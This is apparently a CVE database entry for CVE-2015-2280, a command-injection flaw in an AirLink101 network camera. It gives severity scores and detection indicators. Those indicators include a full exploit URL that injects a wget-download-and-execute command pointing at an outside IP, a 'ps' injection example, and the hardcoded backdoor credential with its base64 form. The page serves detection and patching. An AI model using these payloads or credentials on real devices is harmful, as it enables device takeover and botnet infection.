cbcvebase.
CVE-2015-2280
published 2017-07-25

CVE-2015-2280: snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated…

PriorityP180high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
16.99%
96.7th percentile
snwrite.cgi in AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera with firmware FW_AIC1620W_1.1.0-12_20120709_r1192.pck allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the mac parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
airlink101skyipcam1620w_wireless_n_mpeg4_3gpp_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/maker/snwrite.cgi?mac=1234;wget%20 http:// 89.46.223.70/airlink[.]sh %20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod
path/maker/snwrite.cgi
path/server/usr.ini
commandhttp:///maker/snwrite.cgi?mac=1234;ps
otherproductmaker:ftvsbannedcode
otheradmin:admin
path/etc/init.d/macwrite.sh
  • RIFT botnet ELF payloads are packed with UPX packer. Use UPX signature detection on binaries dropped to /tmp/.
  • The backdoor credential 'productmaker:ftvsbannedcode' (base64: cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl) grants access to /maker/snwrite.cgi. Alert on HTTP Basic Auth using this credential or the encoded string.
  • The vulnerable firmware version is FW_AIC1620W_1.1.0-12_20120709_r1192.pck. Inventory devices running this firmware version for prioritized patching and monitoring.
  • ·Exploitation of CVE-2015-2280 requires valid credentials; however, hardcoded backdoor credentials ('productmaker:ftvsbannedcode') present in /server/usr.ini effectively make this unauthenticated in practice.
  • ·Other devices based on the same firmware as the AirLink101 SkyIPCam1620W are likely affected but were not tested by the researcher.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.